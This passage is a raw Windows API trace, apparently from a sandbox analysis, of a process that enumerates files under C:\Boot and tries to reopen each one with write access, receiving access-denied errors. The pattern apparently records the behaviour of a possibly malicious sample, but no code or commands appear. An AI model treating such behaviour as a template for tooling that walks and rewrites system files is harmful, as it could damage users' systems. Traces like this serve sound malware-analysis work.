returned 1 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.553] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0070.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.554] AreFileApisANSI () returned 1 [0070.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-PT\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-PT\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.554] AreFileApisANSI () returned 1 [0070.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-PT\\memtest.exe.mui") returned 30 [0070.554] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.555] GetFileType (hFile=0x41c) returned 0x1 [0070.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.555] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.555] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.555] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.555] CloseHandle (hObject=0x41c) returned 1 [0070.555] AreFileApisANSI () returned 1 [0070.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-PT\\memtest.exe.mui") returned 30 [0070.556] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.556] GetLastError () returned 0x5 [0070.556] GetLastError () returned 0x5 [0070.556] SetLastError (dwErrCode=0x5) [0070.556] GetLastError () returned 0x5 [0070.556] SetLastError (dwErrCode=0x5) [0070.556] GetLastError () returned 0x5 [0070.556] SetLastError (dwErrCode=0x5) [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.556] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.556] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓뎠")) returned 0 [0070.556] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0070.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0070.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0070.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0070.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.557] AreFileApisANSI () returned 1 [0070.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\qps-ploc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\qps-ploc", lpUsedDefaultChar=0x0) returned 17 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.557] AreFileApisANSI () returned 1 [0070.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0070.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7aae8 [0070.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x7aae8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\qps-ploc") returned 17 [0070.558] CreateFileW (lpFileName="C:\\Boot\\qps-ploc" (normalized: "c:\\boot\\qps-ploc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.558] GetLastError () returned 0x5 [0070.558] GetLastError () returned 0x5 [0070.558] SetLastError (dwErrCode=0x5) [0070.558] GetLastError () returned 0x5 [0070.558] SetLastError (dwErrCode=0x5) [0070.558] GetLastError () returned 0x5 [0070.558] SetLastError (dwErrCode=0x5) [0070.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aae8 | out: hHeap=0x20000) returned 1 [0070.558] AreFileApisANSI () returned 1 [0070.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0070.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7ac38 [0070.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\qps-ploc") returned 17 [0070.558] CreateFileW (lpFileName="C:\\Boot\\qps-ploc" (normalized: "c:\\boot\\qps-ploc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.558] GetLastError () returned 0x5 [0070.558] GetLastError () returned 0x5 [0070.558] SetLastError (dwErrCode=0x5) [0070.558] GetLastError () returned 0x5 [0070.558] SetLastError (dwErrCode=0x5) [0070.558] GetLastError () returned 0x5 [0070.558] SetLastError (dwErrCode=0x5) [0070.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0070.559] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0070.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0070.559] FindFirstFileExW (in: lpFileName="C:\\Boot\\qps-ploc\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77fd0 [0070.559] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.559] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0070.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.560] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0070.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.561] AreFileApisANSI () returned 1 [0070.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\qps-ploc\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\qps-ploc\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 33 [0070.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0070.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 